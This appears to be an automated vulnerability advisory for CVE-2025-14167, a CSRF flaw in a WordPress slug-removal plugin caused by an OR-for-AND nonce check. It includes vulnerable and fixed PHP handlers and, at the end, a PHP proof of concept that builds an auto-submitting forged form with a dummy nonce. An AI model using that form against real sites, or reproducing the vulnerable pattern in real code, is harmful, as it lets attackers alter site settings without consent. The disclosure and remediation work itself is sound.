Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-14167: Remove Post Type Slug <= 1.0.2 – Cross-Site Request Forgery to Settings Update (remove-post-type-slug)

Severity: Medium (CVSS 4.3)
CWE: 352
Vulnerable Version: 1.0.2
Patched Version:
Disclosed: February 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14167 (metadata-based):
This vulnerability is a Cross-Site Request Forgery (CSRF) flaw in the Remove Post Type Slug WordPress plugin, affecting all versions up to and including 1.0.2. The vulnerability allows unauthenticated attackers to change the plugin’s settings by tricking an administrator into clicking a malicious link.

Atomic Edge research indicates the root cause is flawed nonce validation logic. The vulnerability description explicitly states the validation incorrectly uses a logical OR (||) operator instead of an AND (&&) operator. Because of this operator mix-up, the check passes whenever the nonce field is non-empty, even if nonce verification fails. The correct logic should only pass the check when the nonce field is not empty AND the verification succeeds. This conclusion is directly stated in the CVE description, not inferred from code review.

Exploitation requires an attacker to craft a forged HTTP request that submits a POST form to the plugin’s settings update endpoint. The attacker must lure a logged-in administrator into loading a page containing the malicious form. The request would target the plugin’s admin menu callback, likely accessed via `/wp-admin/admin.php?page=remove-post-type-slug` or a similar admin-ajax.php handler. The payload would contain the new settings parameters. The attack succeeds because the flawed nonce check allows the request to proceed without a valid nonce, as long as the nonce parameter is present in the request.

Remediation requires correcting the conditional logic in the nonce validation function. The developer must replace the logical OR operator with a logical AND operator. This ensures the sensitive action only executes when a valid nonce is both present and verified. The patch should also ensure the function performing the update conducts a proper capability check, such as `current_user_can('manage_options')`, though the CSRF flaw is the primary issue.
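The following is an added illustration, not the plugin's code and not code from Atomic Edge: it places the operator mistake described in the root-cause paragraph beside the corrected handler that the remediation paragraph calls for (AND logic plus a capability check). The function names, the option name `rpts_example_settings`, the nonce action string `rpts_example_save` and the form field layout are all hypothetical; the WordPress API calls (`wp_verify_nonce`, `check_admin_referer`-style flow via `wp_die`, `current_user_can`, `wp_nonce_field`, `update_option`) are the standard ones.

```php
<?php
// Added illustration (not the plugin's code). Function, option and
// nonce-action names are hypothetical; WordPress API calls are real.

// VULNERABLE PATTERN, as the advisory describes it: with '||' the request
// is accepted whenever the nonce field is merely non-empty, so the result
// of wp_verify_nonce() never decides the outcome. A cross-site form that
// ships any '_wpnonce' value therefore reaches the settings update.
function rpts_example_vulnerable_save() {
    $nonce = isset( $_POST['_wpnonce'] ) ? wp_unslash( $_POST['_wpnonce'] ) : '';

    if ( ! empty( $nonce ) || wp_verify_nonce( $nonce, 'rpts_example_save' ) ) {
        rpts_example_persist_settings();
    }
}

// FIXED PATTERN: the nonce must be present AND verify, and the caller must
// also hold the capability needed to change site options. Written as an
// early-exit guard, "present && verified" becomes "empty || !verified".
function rpts_example_fixed_save() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }

    $nonce = isset( $_POST['_wpnonce'] ) ? wp_unslash( $_POST['_wpnonce'] ) : '';

    // wp_verify_nonce() returns 1 or 2 for a valid nonce and false otherwise;
    // the nonce is bound to the logged-in user and the action string, so a
    // forged cross-site form cannot supply one that verifies.
    if ( empty( $nonce ) || ! wp_verify_nonce( $nonce, 'rpts_example_save' ) ) {
        wp_die( 'Nonce check failed.', '', array( 'response' => 403 ) );
    }

    rpts_example_persist_settings();
}

// Shared by both handlers: sanitise the submitted map of post type => on/off
// before storing it. Key and option names are hypothetical.
function rpts_example_persist_settings() {
    $raw      = isset( $_POST['rpts_example_settings'] ) ? (array) wp_unslash( $_POST['rpts_example_settings'] ) : array();
    $settings = array();
    foreach ( $raw as $post_type => $enabled ) {
        $settings[ sanitize_key( $post_type ) ] = ( '1' === (string) $enabled ) ? '1' : '0';
    }
    update_option( 'rpts_example_settings', $settings );
}

// The legitimate settings form emits a nonce for the same action string, so
// only a page rendered by WordPress for this user can produce a passing value.
function rpts_example_render_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin-post.php' ) ) . '">';
    wp_nonce_field( 'rpts_example_save', '_wpnonce' );
    echo '<input type="hidden" name="action" value="rpts_example_save" />';
    echo '<label><input type="checkbox" name="rpts_example_settings[post]" value="1" /> Remove slug for posts</label>';
    submit_button( 'Save' );
    echo '</form>';
}

// Route the admin-post action to the fixed handler only.
add_action( 'admin_post_rpts_example_save', 'rpts_example_fixed_save' );
```

The early-exit form in the fixed handler is deliberate: a guard written as "reject if empty OR not verified" is the De Morgan complement of "accept if present AND verified", which makes a later accidental flip of `&&`/`||` easier to spot in review than a positive condition with two clauses. The capability check comes first because the nonce only proves intent, not authorisation.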

The impact of successful exploitation is limited to unauthorized modification of the plugin’s configuration settings. An attacker could disable the slug removal feature for specific post types or alter its behavior. This could disrupt site functionality or SEO. The CVSS score of 4.3 (Medium) reflects the need for user interaction (UI:R), the lack of authentication (PR:N), and the low integrity impact (I:L). The vulnerability does not lead to direct code execution, data theft, or privilege escalation.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-14167 - Remove Post Type Slug <= 1.0.2 - Cross-Site Request Forgery to Settings Update
/**
 * Proof-of-concept for CSRF in Remove Post Type Slug plugin <= 1.0.2.
 * This script generates an HTML page containing a malicious form.
 * When a logged-in WordPress administrator visits this page, the form auto-submits,
 * changing the plugin's settings without consent.
 * ASSUMPTIONS:
 * 1. The plugin's settings update endpoint is at /wp-admin/admin.php?page=remove-post-type-slug (common pattern).
 * 2. The vulnerable parameter for the nonce check is named '_wpnonce'.
 * 3. The settings are updated via POST parameters named 'remove_post_type_slug_settings'.
 * 4. The action parameter for the update is 'update'.
 * These assumptions are based on standard WordPress plugin architecture as no code is available.
 */
$target_url = 'http://vulnerable-wordpress-site.com/wp-admin/admin.php?page=remove-post-type-slug';
// Example malicious setting: disable slug removal for 'post' post type.
$malicious_settings = array('post' => '0');
// The attack works with any non-empty nonce value due to the OR logic bug.
$dummy_nonce = 'csrf_attack';
?>
<!DOCTYPE html>
<html>
<body>
  <h2>CSRF PoC for CVE-2025-14167</h2>
  <p>If a site administrator views this page, the plugin settings will be silently altered.</p>
  <form id="exploit" action="<?php echo htmlspecialchars($target_url); ?>" method="POST">
    <input type="hidden" name="_wpnonce" value="<?php echo $dummy_nonce; ?>" />
    <input type="hidden" name="action" value="update" />
    <?php foreach ($malicious_settings as $key => $value): ?>
      <input type="hidden" name="remove_post_type_slug_settings[<?php echo $key; ?>]" value="<?php echo $value; ?>" />
    <?php endforeach; ?>
  </form>
  <script>
    // Auto-submit the form to simulate a single click.
    document.getElementById('exploit').submit();
  </script>
</body>
</html>
